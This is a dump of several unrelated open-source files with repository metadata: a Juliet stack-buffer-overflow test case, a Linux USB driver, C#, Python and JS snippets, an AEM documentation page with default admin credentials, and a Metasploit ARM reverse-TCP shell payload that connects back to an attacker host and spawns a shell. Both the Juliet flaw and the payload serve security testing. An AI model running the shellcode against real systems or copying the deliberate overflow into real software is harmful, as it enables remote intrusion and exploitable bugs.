for (i = 0; i < 100; i++)
{
data[i] = source[i];
}
data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
printWLine(data);
}
}
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodG2B() uses the GoodSource with the BadSink */
static void goodG2B()
{
wchar_t * data;
wchar_t * &dataRef = data;
wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
/* FIX: Set a pointer to a "large" buffer, thus avoiding buffer overflows in the sinks. */
data = dataGoodBuffer;
data[0] = L'\0'; /* null terminate */
{
wchar_t * data = dataRef;
{
size_t i;
wchar_t source[100];
wmemset(source, L'C', 100-1); /* fill with L'C's */
source[100-1] = L'\0'; /* null terminate */
/* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
for (i = 0; i < 100; i++)
{
data[i] = source[i];
}
data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
printWLine(data);
}
}
}
void good()
{
goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
* its own for testing or for building a binary to use in testing binary
* analysis tools. It is not used when compiling all the testcases as one
* application, which is how source code analysis tools are tested.
*/
#ifdef INCLUDEMAIN
using namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33; /* so that we can use good and bad easily */
int main(int argc, char * argv[])
{
/* seed randomness */
srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
printLine("Calling good()...");
good();
printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
printLine("Calling bad()...");
bad();
printLine("Finished bad()");
#endif /* OMITBAD */
return 0;
}
#endif
|
C++
|
BSD-3-Clause
|
JianpingZeng/xcc/xcc/test/juliet/testcases/CWE121_Stack_Based_Buffer_Overflow/s05/CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33.cpp
|
c9c9a7c5-63b6-412e-b564-de901c70d99e
|
[]
|
[]
|
#!/usr/bin/env python2.5
#
# Copyright 2009 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module that contains base class for Melange Expando models.
"""
__authors__ = [
'"Lennard de Rijk" <ljvderijk@gmail.com>',
]
from google.appengine.ext import db
from soc.logic import dicts
class ExpandoBase(db.Expando):
"""Expando Base model.
This might later on contain general functionalities like the
ModelWithFieldAttributes model.
"""
toDict = dicts.toDict
|
Python
|
Apache-2.0
|
MatthewWilkes/mw4068-packaging/src/melange/src/soc/models/expando_base.py
|
58943f07-cec9-4f1e-948f-2b21507d2830
|
[{"tag": "NAME", "value": "Lennard de Rijk", "start": 700, "end": 715, "context": " Melange Expando models.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengin"}, {"tag": "EMAIL", "value": "ljvderijk@gmail.com", "start": 718, "end": 737, "context": "odels.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengine.ext import db\n\nfrom "}]
|
[{"tag": "NAME", "value": "Lennard de Rijk", "start": 700, "end": 715, "context": " Melange Expando models.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengin"}, {"tag": "EMAIL", "value": "ljvderijk@gmail.com", "start": 718, "end": 737, "context": "odels.\n\"\"\"\n\n__authors__ = [\n '\"Lennard de Rijk\" <ljvderijk@gmail.com>',\n]\n\n\nfrom google.appengine.ext import db\n\nfrom "}]
|
var xdprxss_8c =
[
[ "XDpRxSs_CfgInitialize", "group__dprxss__v4__1.html#ga25f3b6123ff5cbf277c4117617980738", null ],
[ "XDpRxSs_CheckLinkStatus", "group__dprxss__v4__1.html#gad307346eadf7cca46055eb02f8e92ddb", null ],
[ "XDpRxSs_ExposePort", "group__dprxss__v4__1.html#ga65886916bf0be3e73f4d718ec087c6f5", null ],
[ "XDpRxSs_HandleDownReq", "group__dprxss__v4__1.html#gaae2cb38734654cfeca1d77b0439c243e", null ],
[ "XDpRxSs_Reset", "group__dprxss__v4__1.html#gaf724dbd61d196f9bd1a8060f1f73816d", null ],
[ "XDpRxSs_SetLaneCount", "group__dprxss__v4__1.html#ga180a0386c25a456d436bbfc9fec05c02", null ],
[ "XDpRxSs_SetLinkRate", "group__dprxss__v4__1.html#gae447b427e7616d143f2170881fa79bb1", null ],
[ "XDpRxSs_SetUserPixelWidth", "group__dprxss__v4__1.html#ga40a20785049e0c92a24c2612dd6a7098", null ],
[ "XDpRxSs_Start", "group__dprxss__v4__1.html#ga5ada36b95407b1169e183bbb7b9847d6", null ]
];
|
JavaScript
|
BSD-3-Clause
|
AndreRenaud/embeddedsw/XilinxProcessorIPLib/drivers/dp12rxss/doc/html/api/xdprxss_8c.js
|
9f0333c4-20c5-4ca0-871c-5b63dea7cd9b
|
[]
|
[]
|
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.34011
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace SerialLabs.Data.AzureTable.Properties
{
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {
private static global::System.Resources.ResourceManager resourceMan;
private static global::System.Globalization.CultureInfo resourceCulture;
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
internal Resources() {
}
/// <summary>
/// Returns the cached ResourceManager instance used by this class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SerialLabs.Data.AzureTable.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;
}
}
/// <summary>
/// Overrides the current thread's CurrentUICulture property for all
/// resource lookups using this strongly typed resource class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Globalization.CultureInfo Culture {
get {
return resourceCulture;
}
set {
resourceCulture = value;
}
}
/// <summary>
/// Looks up a localized string similar to Unable to cast type '{0}' to target type '{1}'..
/// </summary>
internal static string ExpressionEvaluatorInvalidCast {
get {
return ResourceManager.GetString("ExpressionEvaluatorInvalidCast", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Type '{0}' is not supported..
/// </summary>
internal static string ExpressionEvaluatorTypeNotSupported {
get {
return ResourceManager.GetString("ExpressionEvaluatorTypeNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Unable to get value of the node: '{0}'..
/// </summary>
internal static string ExpressionEvaluatorUnableToEvaluate {
get {
return ResourceManager.GetString("ExpressionEvaluatorUnableToEvaluate", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Unable to serialize type: '{0}'..
/// </summary>
internal static string SerializationExtensionsNotSupportedType {
get {
return ResourceManager.GetString("SerializationExtensionsNotSupportedType", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Member '{0}' does not supported..
/// </summary>
internal static string TranslatorMemberNotSupported {
get {
return ResourceManager.GetString("TranslatorMemberNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Invalid method '{0}' arguments..
/// </summary>
internal static string TranslatorMethodInvalidArgument {
get {
return ResourceManager.GetString("TranslatorMethodInvalidArgument", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Method '{0}' does not supported..
/// </summary>
internal static string TranslatorMethodNotSupported {
get {
return ResourceManager.GetString("TranslatorMethodNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Operator '{0}' does not supported..
/// </summary>
internal static string TranslatorOperatorNotSupported {
get {
return ResourceManager.GetString("TranslatorOperatorNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Unable to evaluate an expression: '{0}'..
/// </summary>
internal static string TranslatorUnableToEvaluateExpression {
get {
return ResourceManager.GetString("TranslatorUnableToEvaluateExpression", resourceCulture);
}
}
}
}
|
C#
|
MIT
|
serial-labs/SharedLibraries/Source/SerialLabs.Data.AzureTable/Properties/Resources.Designer.cs
|
f53e1bac-9b25-4bd1-b390-5cfaafd08186
|
[{"tag": "IP_ADDRESS", "value": "4.0.0.0", "start": 942, "end": 949, "context": "m.Resources.Tools.StronglyTypedResourceBuilder\", \"4.0.0.0\")]\n [global::System.Diagnostics.DebuggerNonUse"}]
|
[{"tag": "IP_ADDRESS", "value": "4.0.0.0", "start": 942, "end": 949, "context": "m.Resources.Tools.StronglyTypedResourceBuilder\", \"4.0.0.0\")]\n [global::System.Diagnostics.DebuggerNonUse"}]
|
/*
* Glue code for the ISP1760 driver and bus
* Currently there is support for
* - OpenFirmware
* - PCI
* - PDEV (generic platform device centralized driver model)
*
* (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>
*
*/
#include <linux/usb.h>
#include <linux/io.h>
#include <linux/module.h>
#include <linux/of.h>
#include <linux/platform_device.h>
#include <linux/slab.h>
#include <linux/usb/isp1760.h>
#include <linux/usb/hcd.h>
#include "isp1760-core.h"
#include "isp1760-regs.h"
#ifdef CONFIG_PCI
#include <linux/pci.h>
#endif
#ifdef CONFIG_PCI
static int isp1761_pci_init(struct pci_dev *dev)
{
resource_size_t mem_start;
resource_size_t mem_length;
u8 __iomem *iobase;
u8 latency, limit;
int retry_count;
u32 reg_data;
/* Grab the PLX PCI shared memory of the ISP 1761 we need */
mem_start = pci_resource_start(dev, 3);
mem_length = pci_resource_len(dev, 3);
if (mem_length < 0xffff) {
printk(KERN_ERR "memory length for this resource is wrong\n");
return -ENOMEM;
}
if (!request_mem_region(mem_start, mem_length, "ISP-PCI")) {
printk(KERN_ERR "host controller already in use\n");
return -EBUSY;
}
/* map available memory */
iobase = ioremap_nocache(mem_start, mem_length);
if (!iobase) {
printk(KERN_ERR "Error ioremap failed\n");
release_mem_region(mem_start, mem_length);
return -ENOMEM;
}
/* bad pci latencies can contribute to overruns */
pci_read_config_byte(dev, PCI_LATENCY_TIMER, &latency);
if (latency) {
pci_read_config_byte(dev, PCI_MAX_LAT, &limit);
if (limit && limit < latency)
pci_write_config_byte(dev, PCI_LATENCY_TIMER, limit);
}
/* Try to check whether we can access Scratch Register of
* Host Controller or not. The initial PCI access is retried until
* local init for the PCI bridge is completed
*/
retry_count = 20;
reg_data = 0;
while ((reg_data != 0xFACE) && retry_count) {
/*by default host is in 16bit mode, so
* io operations at this stage must be 16 bit
* */
writel(0xface, iobase + HC_SCRATCH_REG);
udelay(100);
reg_data = readl(iobase + HC_SCRATCH_REG) & 0x0000ffff;
retry_count--;
}
iounmap(iobase);
release_mem_region(mem_start, mem_length);
/* Host Controller presence is detected by writing to scratch register
* and reading back and checking the contents are same or not
*/
if (reg_data != 0xFACE) {
dev_err(&dev->dev, "scratch register mismatch %x\n", reg_data);
return -ENOMEM;
}
/* Grab the PLX PCI mem maped port start address we need */
mem_start = pci_resource_start(dev, 0);
mem_length = pci_resource_len(dev, 0);
if (!request_mem_region(mem_start, mem_length, "ISP1761 IO MEM")) {
printk(KERN_ERR "request region #1\n");
return -EBUSY;
}
iobase = ioremap_nocache(mem_start, mem_length);
if (!iobase) {
printk(KERN_ERR "ioremap #1\n");
release_mem_region(mem_start, mem_length);
return -ENOMEM;
}
/* configure PLX PCI chip to pass interrupts */
#define PLX_INT_CSR_REG 0x68
reg_data = readl(iobase + PLX_INT_CSR_REG);
reg_data |= 0x900;
writel(reg_data, iobase + PLX_INT_CSR_REG);
/* done with PLX IO access */
iounmap(iobase);
release_mem_region(mem_start, mem_length);
return 0;
}
static int isp1761_pci_probe(struct pci_dev *dev,
const struct pci_device_id *id)
{
unsigned int devflags = 0;
int ret;
if (!dev->irq)
return -ENODEV;
if (pci_enable_device(dev) < 0)
return -ENODEV;
ret = isp1761_pci_init(dev);
if (ret < 0)
goto error;
pci_set_master(dev);
dev->dev.dma_mask = NULL;
ret = isp1760_register(&dev->resource[3], dev->irq, 0, &dev->dev,
devflags);
if (ret < 0)
goto error;
return 0;
error:
pci_disable_device(dev);
return ret;
}
static void isp1761_pci_remove(struct pci_dev *dev)
{
isp1760_unregister(&dev->dev);
pci_disable_device(dev);
}
static void isp1761_pci_shutdown(struct pci_dev *dev)
{
printk(KERN_ERR "ips1761_pci_shutdown\n");
}
static const struct pci_device_id isp1760_plx[] = {
{
.class = PCI_CLASS_BRIDGE_OTHER << 8,
.class_mask = ~0,
.vendor = PCI_VENDOR_ID_PLX,
.device = 0x5406,
.subvendor = PCI_VENDOR_ID_PLX,
.subdevice = 0x9054,
},
{ }
};
MODULE_DEVICE_TABLE(pci, isp1760_plx);
static struct pci_driver isp1761_pci_driver = {
.name = "isp1760",
.id_table = isp1760_plx,
.probe = isp1761_pci_probe,
.remove = isp1761_pci_remove,
.shutdown = isp1761_pci_shutdown,
};
#endif
static int isp1760_plat_probe(struct platform_device *pdev)
{
unsigned long irqflags;
unsigned int devflags = 0;
struct resource *mem_res;
struct resource *irq_res;
int ret;
mem_res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
irq_res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
if (!irq_res) {
pr_warn("isp1760: IRQ resource not available\n");
return -ENODEV;
}
irqflags = irq_res->flags & IRQF_TRIGGER_MASK;
if (IS_ENABLED(CONFIG_OF) && pdev->dev.of_node) {
struct device_node *dp = pdev->dev.of_node;
u32 bus_width = 0;
if (of_device_is_compatible(dp, "nxp,usb-isp1761"))
devflags |= ISP1760_FLAG_ISP1761;
/* Some systems wire up only 16 of the 32 data lines */
of_property_read_u32(dp, "bus-width", &bus_width);
if (bus_width == 16)
devflags |= ISP1760_FLAG_BUS_WIDTH_16;
if (of_property_read_bool(dp, "port1-otg"))
devflags |= ISP1760_FLAG_OTG_EN;
if (of_property_read_bool(dp, "analog-oc"))
devflags |= ISP1760_FLAG_ANALOG_OC;
if (of_property_read_bool(dp, "dack-polarity"))
devflags |= ISP1760_FLAG_DACK_POL_HIGH;
if (of_property_read_bool(dp, "dreq-polarity"))
devflags |= ISP1760_FLAG_DREQ_POL_HIGH;
} else if (dev_get_platdata(&pdev->dev)) {
struct isp1760_platform_data *pdata =
dev_get_platdata(&pdev->dev);
if (pdata->is_isp1761)
devflags |= ISP1760_FLAG_ISP1761;
if (pdata->bus_width_16)
devflags |= ISP1760_FLAG_BUS_WIDTH_16;
if (pdata->port1_otg)
devflags |= ISP1760_FLAG_OTG_EN;
if (pdata->analog_oc)
devflags |= ISP1760_FLAG_ANALOG_OC;
if (pdata->dack_polarity_high)
devflags |= ISP1760_FLAG_DACK_POL_HIGH;
if (pdata->dreq_polarity_high)
devflags |= ISP1760_FLAG_DREQ_POL_HIGH;
}
ret = isp1760_register(mem_res, irq_res->start, irqflags, &pdev->dev,
devflags);
if (ret < 0)
return ret;
pr_info("ISP1760 USB device initialised\n");
return 0;
}
static int isp1760_plat_remove(struct platform_device *pdev)
{
isp1760_unregister(&pdev->dev);
return 0;
}
#ifdef CONFIG_OF
static const struct of_device_id isp1760_of_match[] = {
{ .compatible = "nxp,usb-isp1760", },
{ .compatible = "nxp,usb-isp1761", },
{ },
};
MODULE_DEVICE_TABLE(of, isp1760_of_match);
#endif
static struct platform_driver isp1760_plat_driver = {
.probe = isp1760_plat_probe,
.remove = isp1760_plat_remove,
.driver = {
.name = "isp1760",
.of_match_table = of_match_ptr(isp1760_of_match),
},
};
static int __init isp1760_init(void)
{
int ret, any_ret = -ENODEV;
isp1760_init_kmem_once();
ret = platform_driver_register(&isp1760_plat_driver);
if (!ret)
any_ret = 0;
#ifdef CONFIG_PCI
ret = pci_register_driver(&isp1761_pci_driver);
if (!ret)
any_ret = 0;
#endif
if (any_ret)
isp1760_deinit_kmem_cache();
return any_ret;
}
module_init(isp1760_init);
static void __exit isp1760_exit(void)
{
platform_driver_unregister(&isp1760_plat_driver);
#ifdef CONFIG_PCI
pci_unregister_driver(&isp1761_pci_driver);
#endif
isp1760_deinit_kmem_cache();
}
module_exit(isp1760_exit);
|
C
|
BSD-2-Clause
|
yijunyu/demo-fast/datasets/linux-4.11-rc3/drivers/usb/isp1760/isp1760-if.c
|
12d4edcc-705d-4525-8801-24bfcbd4575e
|
[{"tag": "EMAIL", "value": "bigeasy@linutronix.de", "start": 203, "end": 224, "context": "d driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/usb.h>\n#include <linux/i"}, {"tag": "NAME", "value": "Sebastian Siewio", "start": 184, "end": 200, "context": "m device centralized driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/"}]
|
[{"tag": "EMAIL", "value": "bigeasy@linutronix.de", "start": 203, "end": 224, "context": "d driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/usb.h>\n#include <linux/i"}, {"tag": "NAME", "value": "Sebastian Siewio", "start": 184, "end": 200, "context": "m device centralized driver model)\n *\n * (c) 2007 Sebastian Siewior <bigeasy@linutronix.de>\n *\n */\n\n#include <linux/"}]
|
---
title: Alter the Appearance
seo-title: Alter the Appearance
description: Modify the script
seo-description: Modify the script
uuid: 6930381b-74c1-4e63-9621-621dbedbc25e
contentOwner: User
products: SG_EXPERIENCEMANAGER/6.4/COMMUNITIES
topic-tags: developing
content-type: reference
discoiquuid: da3891d3-fa07-4c88-b4ac-077926b3a674
exl-id: 01a20578-56c3-41b3-8a0e-281104af2481
---
# Alter the Appearance {#alter-the-appearance}
## Modify the Script {#modify-the-script}
The comment.hbs script is responsible for creating the overall HTML for each comment.
To not display the avatar next to each posted comment:
1. Copy `comment.hbs`from `libs`to `apps`
1. Select `/libs/social/commons/components/hbs/comments/comment/comment.hbs`
1. Select **[!UICONTROL Copy]**
1. Select `/apps/social/commons/components/hbs/comments/comment`
1. Select **[!UICONTROL Paste]**
1. Open the overlaid `comment.hbs`
* Double-click on node `comment.hbs`in `/apps/social/commons/components/hbs/comments/comment folder`
1. Find the following lines and either delete or comment them out:
```xml
<aside class="scf-comment-author">
<img class="scf-comment-avatar {{#if topLevel}}withTopLevel{{/if}}" src="{{author.avatarUrl}}"></img>
```
Either delete the lines, or surround them with '<!--' and '-->' to comment them out. Also, the characters 'xxx' are being added as a visual indicator of where the avatar would have been.
```xml
<!-- do not display avatar with comment
<aside class="scf-comment-author">
<img class="scf-comment-avatar {{#if topLevel}}withTopLevel{{/if}}" src="{{author.avatarUrl}}"></img>
```
## Replicate the Overlay {#replicate-the-overlay}
Push the overlaid comments component to the publish instance using the Replication Tool.
>[!NOTE]
>
>A more robust form of replication would be to create a package in Package Manager and [activate](../../help/sites-administering/package-manager.md#replicating-packages) it. A package can be exported and archived.
From the global navigation, select **[!UICONTROL Tools > Deployment > Replication]** and then **[!UICONTROL Activate Tree]**.
For the Start Path enter `/apps/social/commons` and select **[!UICONTROL Activate]**.

## View Results {#view-results}
If you login to the publish instance as an administrator, e.g., http://localhost:4503/crx/de as admin/admin, you can verify the overlaid components are there.
If you logout and re-login as `aaron.mcdonald@mailinator.com/password` and refresh the page, you will observe that the posted comment no longer displays with an avatar, instead a simple 'xxx' is displayed.

|
Markdown
|
MIT
|
friendlymahi/experience-manager-64.en/help/communities/overlay-alter-appearance.md
|
b7856a13-0695-4481-879b-25caf7b22456
|
[{"tag": "EMAIL", "value": "discoiquuid", "start": 286, "end": 297, "context": "ES\ntopic-tags: developing\ncontent-type: reference\ndiscoiquuid: da3891d3-fa07-4c88-b4ac-077926b3a674\nexl-id: 01a"}, {"tag": "EMAIL", "value": "aaron.mcdonald@mailinator.com", "start": 2511, "end": 2540, "context": "onents are there.\n\nIf you logout and re-login as `aaron.mcdonald@mailinator.com/password` and refresh the page, you will observe "}]
|
[{"tag": "EMAIL", "value": "discoiquuid", "start": 286, "end": 297, "context": "ES\ntopic-tags: developing\ncontent-type: reference\ndiscoiquuid: da3891d3-fa07-4c88-b4ac-077926b3a674\nexl-id: 01a"}, {"tag": "EMAIL", "value": "aaron.mcdonald@mailinator.com", "start": 2511, "end": 2540, "context": "onents are there.\n\nIf you logout and re-login as `aaron.mcdonald@mailinator.com/password` and refresh the page, you will observe "}]
|
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'civ',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 172, 'ADDR' ],
'LPORT' => [ 170, 'n' ],
},
'Payload' =>
[
#### Tested successfully on:
# Linux 2.6.29.6-cm42 armv6l
# Linux 2.6.29.6-cyanogenmod armv6l
# Linux version 2.6.25-00350-g40fff9a armv5l
# Linux version 2.6.27-00110-g132305e armv5l
# Linux version 2.6.29-00177-g24ee4d2 armv5l
# Linux version 2.6.29-00255-g7ca5167 armv5l
#
# Probably requires process to have INTERNET permission
# or root.
####
# socket(2,1,6)
0xe3a00002, # mov r0, #2 ; 0x2
0xe3a01001, # mov r1, #1 ; 0x1
0xe2812005, # add r2, r1, #5 ; 0x5
0xe3a0708c, # mov r7, #140 ; 0x8c
0xe287708d, # add r7, r7, #141 ; 0x8d
0xef000000, # svc 0x00000000
# connect(soc, socaddr, 0x10)
0xe1a06000, # mov r6, r0
0xe28f1084, # 1dr r1, pc, #132 ; 0x84
0xe3a02010, # mov r2, #16 ; 0x10
0xe3a0708d, # mov r7, #141 ; 0x8d
0xe287708e, # add r7, r7, #142 ; 0x8e
0xef000000, # svc 0x00000000
# dup2(soc,0) @stdin
0xe1a00006, # mov r0, r6
0xe3a01000, # mov r1, #0 ; 0x0
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
# dup2(soc,1) @stdout
0xe1a00006, # mov r0, r6
0xe3a01001, # mov r1, #1 ; 0x1
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
# dup2(soc,2) @stderr
0xe1a00006, # mov r0, r6
0xe3a01002, # mov r1, #2 ; 0x2
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
# execve("/system/bin/sh", args, env)
# Shrink me here. I am lame.
0xe28f0048, # add r0, pc, #72 ; 0x48
0xe0244004, # eor r4, r4, r4
0xe92d0010, # push {r4}
0xe1a0200d, # mov r2, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe92d0010, # push {r4}
0xe59f1048, # ldr r1, [pc, #72] ; 8124 <env+0x8>
0xe92d0002, # push {r1}
0xe92d2000, # push {sp}
0xe1a0100d, # mov r1, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe3a0700b, # mov r7, #11 ; 0xb
0xef000000, # svc 0x00000000
# exit(0)
0xe3a00000, # mov r0, #0 ; 0x0
0xe3a07001, # mov r7, #1 ; 0x1
0xef000000, # svc 0x00000000
# <af>:
# port offset = 170, ip offset = 172
0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
# <shell>:
0x00000000, # .word 0x00000000 ; the shell goes here!
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
# <arg>:
0x00000000 # .word 0x00000000 ; the args!
].pack("V*")
}
))
# Register command execution options
register_options(
[
OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
], self.class)
end
def generate
p = super
sh = datastore['SHELL']
if sh.length >= 16
raise ArgumentError, "The specified shell must be less than 16 bytes."
end
p[176, sh.length] = sh
arg = datastore['SHELLARG']
if arg
if arg.length >= 4
raise ArgumentError, "The specified shell argument must be less than 4 bytes."
end
p[192, arg.length] = arg
end
p
end
end
|
Ruby
|
Apache-2.0
|
CCrashBandicot/metasploit-framework/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
|
d2f74f9d-e9b8-46bd-ad3a-3eb441f4d6d1
|
[{"tag": "IP_ADDRESS", "value": "192.168.1.1", "start": 4401, "end": 4412, "context": " 0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1\n # <shell>:\n 0x00000000"}]
|
[{"tag": "IP_ADDRESS", "value": "192.168.1.1", "start": 4401, "end": 4412, "context": " 0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1\n # <shell>:\n 0x00000000"}]
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
"""Centralized catalog of paths."""
import os
class DatasetCatalog(object):
DATA_DIR = "./datasets"
DATASETS = {
"coco_2017_train": {
"img_dir": "coco/train2017",
"ann_file": "coco/annotations/instances_train2017.json"
},
"coco_2017_val": {
"img_dir": "coco/val2017",
"ann_file": "coco/annotations/instances_val2017.json"
},
"coco_2017_test_dev": {
"img_dir": "coco/test2017",
"ann_file": "coco/annotations/image_info_test-dev2017.json"
},
"coco_2014_train": {
"img_dir": "coco/train2014",
"ann_file": "coco/annotations/instances_train2014.json"
},
"coco_2014_val": {
"img_dir": "coco/val2014",
"ann_file": "coco/annotations/instances_val2014.json"
},
"coco_2014_minival": {
"img_dir": "coco/val2014",
"ann_file": "coco/annotations/instances_minival2014.json"
},
"coco_2014_valminusminival": {
"img_dir": "coco/val2014",
"ann_file": "coco/annotations/instances_valminusminival2014.json"
},
"keypoints_coco_2014_train": {
"img_dir": "coco/train2014",
"ann_file": "coco/annotations/person_keypoints_train2014.json",
},
"keypoints_coco_2014_val": {
"img_dir": "coco/val2014",
"ann_file": "coco/annotations/person_keypoints_val2014.json"
},
"keypoints_coco_2014_minival": {
"img_dir": "coco/val2014",
"ann_file": "coco/annotations/person_keypoints_minival2014.json",
},
"keypoints_coco_2014_valminusminival": {
"img_dir": "coco/val2014",
"ann_file": "coco/annotations/person_keypoints_valminusminival2014.json",
},
"voc_2007_train": {
"data_dir": "voc/VOC2007",
"split": "train"
},
"voc_2007_train_cocostyle": {
"img_dir": "voc/VOC2007/JPEGImages",
"ann_file": "voc/VOC2007/Annotations/pascal_train2007.json"
},
"voc_2007_val": {
"data_dir": "voc/VOC2007",
"split": "val"
},
"voc_2007_val_cocostyle": {
"img_dir": "voc/VOC2007/JPEGImages",
"ann_file": "voc/VOC2007/Annotations/pascal_val2007.json"
},
"voc_2007_test": {
"data_dir": "voc/VOC2007",
"split": "test"
},
"voc_2007_test_cocostyle": {
"img_dir": "voc/VOC2007/JPEGImages",
"ann_file": "voc/VOC2007/Annotations/pascal_test2007.json"
},
"voc_2012_train": {
"data_dir": "voc/VOC2012",
"split": "train"
},
"voc_2012_train_cocostyle": {
"img_dir": "voc/VOC2012/JPEGImages",
"ann_file": "voc/VOC2012/Annotations/pascal_train2012.json"
},
"voc_2012_val": {
"data_dir": "voc/VOC2012",
"split": "val"
},
"voc_2012_val_cocostyle": {
"img_dir": "voc/VOC2012/JPEGImages",
"ann_file": "voc/VOC2012/Annotations/pascal_val2012.json"
},
"voc_2012_test": {
"data_dir": "voc/VOC2012",
"split": "test"
# PASCAL VOC2012 doesn't made the test annotations available, so there's no json annotation
},
"cityscapes_fine_instanceonly_seg_train_cocostyle": {
"img_dir": "cityscapes/images",
"ann_file": "cityscapes/annotations/instancesonly_filtered_gtFine_train.json"
},
"cityscapes_fine_instanceonly_seg_val_cocostyle": {
"img_dir": "cityscapes/images",
"ann_file": "cityscapes/annotations/instancesonly_filtered_gtFine_val.json"
},
"cityscapes_fine_instanceonly_seg_test_cocostyle": {
"img_dir": "cityscapes/images",
"ann_file": "cityscapes/annotations/instancesonly_filtered_gtFine_test.json"
}
}
@staticmethod
def get(name):
if "coco" in name:
data_dir = DatasetCatalog.DATA_DIR
attrs = DatasetCatalog.DATASETS[name]
args = dict(
root=os.path.join(data_dir, attrs["img_dir"]),
ann_file=os.path.join(data_dir, attrs["ann_file"]),
)
return dict(
factory="COCODataset",
args=args,
)
elif "voc" in name:
data_dir = DatasetCatalog.DATA_DIR
attrs = DatasetCatalog.DATASETS[name]
args = dict(
data_dir=os.path.join(data_dir, attrs["data_dir"]),
split=attrs["split"],
)
return dict(
